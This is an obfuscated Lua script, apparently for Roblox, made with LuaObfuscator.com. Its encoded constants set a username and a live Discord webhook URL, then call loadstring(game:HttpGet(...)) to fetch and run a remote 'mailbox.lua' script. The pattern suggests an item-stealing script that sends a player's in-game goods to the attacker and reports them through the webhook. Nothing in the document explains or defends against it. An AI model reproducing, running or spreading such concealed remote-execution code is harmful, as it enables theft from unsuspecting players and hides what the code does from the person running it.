--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v77=v5(v70,v19);v19=nil;return v77;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -(1638 -(1523 + 114))))))%(2^(((v33-(1 -0)) -(v32-((2 + 0) -1))) + (620 -(555 + 64)))) ;return v71-(v71%((1328 -396) -((1922 -(68 + 997)) + 74))) ;else local v72=1270 -(226 + 1044) ;local v73;while true do if (v72==((2473 -1905) -(367 + 201))) then v73=(929 -(214 + (830 -(32 + 85))))^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (877 -(277 + 5 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0;local v36;local v37;while true do if (v35==(2 -1)) then return (v37 * (57 + (549 -(87 + 263)))) + v36 ;end if (v35==0) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (959 -(892 + 65)) ;v35=1;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -(1713 -(802 + 150)))) + v38 ;end local function v24()local v42=0 -(0 -0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 -0)) then v45=1 + (1486 -(998 + 488)) ;v46=(v20(v44,998 -(915 + 82) ,56 -36 ) * ((2 + 0 + 0 + 0)^(41 -9))) + v43 ;v42=1189 -(1069 + 118) ;end if (v42==(10 -7)) then if (v47==(0 -(0 + 0))) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1 -0 ;v45=772 -(201 + 571) ;end elseif (v47==(2031 + 16)) then return ((v46==(791 -(368 + 423))) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/(2^(199 -147)))) ;end if (v42==((1580 -(116 + 1022)) -(416 + (885 -(814 + 45))))) then v43=v23();v44=v23();v42=2 -1 ;end if (v42==(6 -4)) then v47=v20(v44,21,31);v48=((v20(v44,14 + 18 )==(1 -(0 + 0))) and  -(439 -(145 + 293))) or 1 ;v42=433 -(44 + 386) ;end end end local function v25(v49)local v50=0 + 0 ;local v51;local v52;while true do if (v50==(887 -(261 + (2371 -(760 + 987))))) then v52={};for v78=(1914 -(1789 + 124)) -0 , #v51 do v52[v78]=v2(v1(v3(v51,v78,v78)));end v50=3;end if (v50==(1080 -(1020 + 60))) then v51=nil;if  not v49 then local v94=1423 -(630 + 793) ;while true do if ((0 -0)==v94) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=1;end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=2;end if (v50==3) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=1187 -(13 + 1174) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(405 -(255 + 150))) then v54=0 + 0 ;v55=nil;v53=1 + 0 ;end if ((2 + 0)~=v53) then else v58=nil;v59=nil;v53=12 -9 ;end if (v53==(3 -2)) then v56=nil;v57=nil;v53=4 -2 ;end if (v53~=(1743 -(404 + 1335))) then else while true do if (v54==(2 -1)) then local v98=406 -(183 + 223) ;while true do if (v98==0) then v57=nil;v58=nil;v98=2 -1 ;end if (v98==(1 -0)) then v54=2;break;end end end if (v54==(0 + 0)) then local v99=0;while true do if (v99==1) then v54=1 + 0 ;break;end if (v99==(0 -0)) then v55=337 -(10 + 327) ;v56=nil;v99=754 -(239 + 514) ;end end end if (v54~=(2 + 1)) then else v61=nil;while true do local v101=1329 -(797 + 532) ;local v102;while true do if (v101==0) then v102=0 + 0 ;while true do if (v102==(0 + 0)) then local v107=0;local v108;while true do if (v107~=0) then else v108=449 -(108 + 341) ;while true do if (1==v108) then v102=1 + 0 ;break;end if (v108==(0 -0)) then if (v55~=1) then else local v164=1202 -(373 + 829) ;local v165;while true do if (v164~=(731 -(476 + 255))) then else v165=0;while true do if (v165==1) then v61={};v55=1132 -(369 + 761) ;break;end if ((0 + 0)==v165) then local v171=0 -0 ;local v172;while true do if (v171==0) then v172=0;while true do if (v172==(1 -0)) then v165=470 -(270 + 199) ;break;end if (v172==(0 + 0)) then local v180=1819 -(580 + 1239) ;while true do if ((2 -1)==v180) then v172=1;break;end if (v180~=(0 + 0)) then else v59={v56,v57,nil,v58};v60=v23();v180=1 + 0 ;end end end end break;end end end end break;end end end if (v55==2) then local v166=0 -0 ;local v167;local v168;while true do if ((336 -(144 + 192))~=v166) then else v167=216 -(42 + 174) ;v168=nil;v166=1 + 0 ;end if (v166==(1 + 0)) then while true do if (v167==(0 + 0)) then v168=0 + 0 ;while true do if (v168==(1505 -(363 + 1141))) then for v176=1581 -(1183 + 397) ,v23() do local v177=1836 -(1045 + 791) ;local v178;local v179;while true do if (v177==0) then local v182=0 -0 ;while true do if (v182==(1 + 0)) then v177=1;break;end if (v182==0) then v178=0 -0 ;v179=nil;v182=506 -(351 + 154) ;end end end if (v177==(1 + 0)) then while true do if (v178==(1975 -(1913 + 62))) then v179=v21();if (v20(v179,1 + 0 ,2 -1 )~=0) then else local v190=1559 -(1381 + 178) ;local v191;local v192;local v193;local v194;local v195;local v196;while true do if (v190==(1935 -(565 + 1368))) then v195=nil;v196=nil;v190=3;end if (1~=v190) then else v193=nil;v194=nil;v190=2;end if ((0 -0)==v190) then v191=0;v192=nil;v190=1662 -(1477 + 184) ;end if (v190~=3) then else while true do if ((1 + 0)~=v191) then else local v199=0 -0 ;while true do if (v199==0) then v194=nil;v195=nil;v199=1 + 0 ;end if (v199==1) then v191=858 -(564 + 292) ;break;end end end if (v191==(0 -0)) then v192=0;v193=nil;v191=1;end if (2~=v191) then else v196=nil;while true do if ((1 + 0)==v192) then local v204=0 -0 ;local v205;while true do if (v204==(0 -0)) then v205=304 -(244 + 60) ;while true do if (v205~=(1 + 0)) then else v192=2 + 0 ;break;end if (v205==(476 -(41 + 435))) then local v219=0 -0 ;while true do if (v219==0) then v195=nil;v196=nil;v219=1002 -(938 + 63) ;end if (v219==(1 + 0)) then v205=1 -0 ;break;end end end end break;end end end if ((1127 -(936 + 189))==v192) then while true do if (v193~=1) then else local v208=1784 -(214 + 1570) ;local v209;while true do if (v208~=(0 + 0)) then else v209=1613 -(1565 + 48) ;while true do if (v209==0) then local v221=0 + 0 ;local v222;while true do if ((0 + 0)==v221) then v222=1138 -(782 + 356) ;while true do if (v222==1) then v209=268 -(176 + 91) ;break;end if (v222==0) then local v230=0;while true do if (v230~=(1 + 0)) then else v222=2 -1 ;break;end if (v230~=(0 -0)) then else v196={v22(),v22(),nil,nil};if (v194==(0 + 0)) then local v232=0 -0 ;local v233;local v234;local v235;while true do if (v232==(0 -0)) then v233=0 -0 ;v234=nil;v232=1;end if (v232==(1019 -(697 + 321))) then v235=nil;while true do if (v233==(0 -0)) then local v238=0 -0 ;while true do if ((0 + 0)==v238) then v234=0 -0 ;v235=nil;v238=1 + 0 ;end if (v238~=1) then else v233=1;break;end end end if (v233~=(2 -1)) then else while true do if (v234==(0 + 0)) then v235=0 -0 ;while true do if (v235==(0 -0)) then v196[1230 -(322 + 905) ]=v22();v196[615 -(602 + 9) ]=v22();break;end end break;end end break;end end break;end end elseif (v194==(1190 -(449 + 740))) then v196[875 -(826 + 46) ]=v23();elseif (v194==(2 -0)) then v196[1 + 2 ]=v23() -(2^(963 -(245 + 702))) ;elseif (v194==(9 -6)) then local v239=0 + 0 ;local v240;while true do if (v239~=0) then else v240=0;while true do if (v240==0) then v196[1901 -(260 + 1638) ]=v23() -((442 -(382 + 58))^(53 -37)) ;v196[12 -8 ]=v22();break;end end break;end end end v230=1 + 0 ;end end end end break;end end end if (v209==(1 + 0)) then v193=2 + 0 ;break;end end break;end end end if (v193==(2 + 0)) then local v210=0;local v211;while true do if (v210~=0) then else v211=0 + 0 ;while true do if (v211==(0 -0)) then local v223=0 -0 ;while true do if (v223==1) then v211=1;break;end if (v223==(1205 -(902 + 303))) then if (v20(v195,1620 -(1427 + 192) ,1 -0 )~=(2 -1)) then else v196[4 -2 ]=v61[v196[2]];end if (v20(v195,1 + 1 ,1692 -(1121 + 569) )==(215 -(22 + 192))) then v196[686 -(483 + 200) ]=v61[v196[1466 -(1404 + 59) ]];end v223=2 -1 ;end end end if (v211==1) then v193=3 + 0 ;break;end end break;end end end if (v193==(3 -0)) then if (v20(v195,3,768 -(468 + 297) )~=(563 -(334 + 228))) then else v196[13 -9 ]=v61[v196[6 -2 ]];end v56[v176]=v196;break;end if (v193==(0 -0)) then local v213=325 -(45 + 280) ;local v214;local v215;while true do if (v213~=(0 -0)) then else v214=0 -0 ;v215=nil;v213=1 + 0 ;end if (v213==(237 -(141 + 95))) then while true do if (v214~=(0 + 0)) then else v215=0;while true do if (v215==(0 + 0)) then local v225=0 -0 ;while true do if (v225==0) then local v231=0;while true do if (v231==1) then v225=2 -1 ;break;end if (v231==0) then v194=v20(v179,4 -2 ,1 + 2 );v195=v20(v179,4,1778 -(1733 + 39) );v231=1;end end end if (v225~=1) then else v215=2 -1 ;break;end end end if (v215~=1) then else v193=1035 -(125 + 909) ;break;end end break;end end break;end end end end break;end if (v192==(0 + 0)) then local v206=0 + 0 ;while true do if (v206==0) then local v216=0 -0 ;while true do if (v216~=(0 + 0)) then else v193=0;v194=nil;v216=1;end if (v216==1) then v206=1 -0 ;break;end end end if (v206==(237 -(46 + 190))) then v192=1;break;end end end end break;end end break;end end end break;end end break;end end end v55=98 -(51 + 44) ;break;end if (v168~=0) then else local v175=0 + 0 ;while true do if ((0 + 0)~=v175) then else for v183=164 -(92 + 71) ,v60 do local v184=0 + 0 ;local v185;local v186;local v187;local v188;local v189;while true do if (v184~=(0 -0)) then else v185=0;v186=nil;v184=766 -(574 + 191) ;end if (v184==1) then v187=nil;v188=nil;v184=2;end if (v184==(2 + 0)) then v189=nil;while true do if (2==v185) then while true do if (0==v186) then local v197=0 -0 ;local v198;while true do if (v197==0) then v198=0;while true do if (v198==(664 -(174 + 489))) then v186=2 -1 ;break;end if (v198==0) then local v207=1905 -(830 + 1075) ;while true do if (v207==0) then v187=0;v188=nil;v207=1;end if (v207==1) then v198=1;break;end end end end break;end end end if (1~=v186) then else v189=nil;while true do if (v187~=(0 + 0)) then else local v200=0;local v201;local v202;while true do if (v200~=(850 -(254 + 595))) then else while true do if ((126 -(55 + 71))==v201) then v202=0 -0 ;while true do if (v202==0) then local v220=1790 -(573 + 1217) ;while true do if (v220==(2 -1)) then v202=1 + 0 ;break;end if (v220~=(0 + 0)) then else local v224=0 -0 ;while true do if (v224==(940 -(714 + 225))) then v220=2 -1 ;break;end if (v224==(0 -0)) then v188=v21();v189=nil;v224=1 -0 ;end end end end end if ((1 + 0)~=v202) then else v187=1;break;end end break;end end break;end if (v200~=(0 -0)) then else v201=806 -(118 + 688) ;v202=nil;v200=1;end end end if (v187==1) then if (v188==(3 -2)) then v189=v21()~=0 ;elseif (v188==2) then v189=v24();elseif (v188==(51 -(25 + 23))) then v189=v25();end v61[v183]=v189;break;end end break;end end break;end if (v185==(2 -1)) then v188=nil;v189=nil;v185=1 + 1 ;end if (v185==0) then v186=1886 -(927 + 959) ;v187=nil;v185=1;end end break;end end end v59[10 -7 ]=v21();v175=733 -(16 + 716) ;end if (v175~=(1 -0)) then else v168=98 -(11 + 86) ;break;end end end end break;end end break;end end end v108=2 -1 ;end end break;end end end if (v102==(286 -(175 + 110))) then if ((526 -(423 + 100))==v55) then local v137=0 -0 ;while true do if ((0 -0)~=v137) then else local v162=0 -0 ;local v163;while true do if (v162==(0 + 0)) then v163=1796 -(503 + 1293) ;while true do if ((771 -(326 + 445))==v163) then local v170=0 -0 ;while true do if (v170==0) then for v173=1 + 0 ,v23() do v57[v173-(1062 -(810 + 251)) ]=v28();end return v59;end end end end break;end end end end end if (v55==0) then local v138=0;local v139;while true do if (v138==(0 + 0)) then v139=0;while true do if (v139==(712 -(530 + 181))) then v58={};v55=1 + 0 ;break;end if (v139==(881 -(614 + 267))) then local v169=32 -(19 + 13) ;while true do if (v169~=(1 + 0)) then else v139=534 -(43 + 490) ;break;end if (v169==(733 -(711 + 22))) then v56={};v57={};v169=3 -2 ;end end end end break;end end end break;end end break;end end end break;end if (v54~=(861 -(240 + 619))) then else local v100=0 + 0 ;while true do if (v100~=(1 -0)) then else v54=3;break;end if (0==v100) then v59=nil;v60=nil;v100=1 + 0 ;end end end end break;end if (v53==3) then v60=nil;v61=nil;v53=7 -3 ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v80=v66;local v81=v67;local v82=v68;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v95=0,v88 do if (v95>=v82) then v86[v95-v82 ]=v87[v95 + 1 ];else v90[v95]=v87[v95 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=10) then if (v93<=4) then if (v93<=1) then if (v93==0) then local v109=0;local v110;local v111;local v112;local v113;while true do if (v109==1) then v85=(v112 + v110) -1 ;v113=0;v109=2;end if (0==v109) then v110=v92[2];v111,v112=v83(v90[v110](v13(v90,v110 + 1 ,v92[3])));v109=1;end if (v109==2) then for v155=v110,v85 do v113=v113 + 1 ;v90[v155]=v111[v113];end break;end end else local v114=v92[2];v90[v114]=v90[v114](v13(v90,v114 + 1 ,v85));end elseif (v93<=2) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93==3) then v84=v92[3];else v90[v92[2]]=v92[3]~=0 ;end elseif (v93<=7) then if (v93<=5) then local v116=v92[2];local v117,v118=v83(v90[v116](v13(v90,v116 + 1 ,v92[3])));v85=(v118 + v116) -1 ;local v119=0;for v134=v116,v85 do v119=v119 + 1 ;v90[v134]=v117[v119];end elseif (v93>6) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end else v90[v92[2]]=v92[3];end elseif (v93<=8) then v64[v92[3]]=v90[v92[2]];elseif (v93>9) then do return;end else local v145=v92[2];v90[v145]=v90[v145](v13(v90,v145 + 1 ,v85));end elseif (v93<=15) then if (v93<=12) then if (v93>11) then local v122=v92[2];local v123=v90[v92[3]];v90[v122 + 1 ]=v123;v90[v122]=v123[v92[4]];elseif ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v64;else v90[v92[2]]=v64[v92[3]];end elseif (v93<=13) then local v127=v92[2];local v128=v90[v92[3]];v90[v127 + 1 ]=v128;v90[v127]=v128[v92[4]];elseif (v93>14) then v64[v92[3]]=v90[v92[2]];else do return;end end elseif (v93<=18) then if (v93<=16) then v90[v92[2]]=v92[3];elseif (v93==17) then v84=v92[3];elseif ((v92[3]=="_ENV") or (v92[3]=="getfenv")) then v90[v92[2]]=v64;else v90[v92[2]]=v64[v92[3]];end elseif (v93<=19) then v90[v92[2]]();elseif (v93>20) then v90[v92[2]]();else v90[v92[2]]=v92[3]~=0 ;end v84=v84 + 1 ;end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030A3O00557365436F646542595303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31383730313638333439322O3338343835322F356C4F35315438756C7351716C71653849553468766E2O6A4B7166636C354474654579506671546C59523671434835766D4F69776C68744863784C47723670445A756465001D3O0012063O00013O0026023O000C000100020004113O000C000100120B000100033O00120B000200043O00200C000200020005001206000400064O0014000500014O0005000200054O000100013O00022O00150001000100010004113O001C00010026023O0001000100010004113O00010001001206000100013O00260200010016000100010004113O00160001001206000200083O001208000200073O0012060002000A3O001208000200093O001206000100023O0026020001000F000100020004113O000F00010012063O00023O0004113O000100010004113O000F00010004113O000100012O000E3O00017O00",v9(),...);
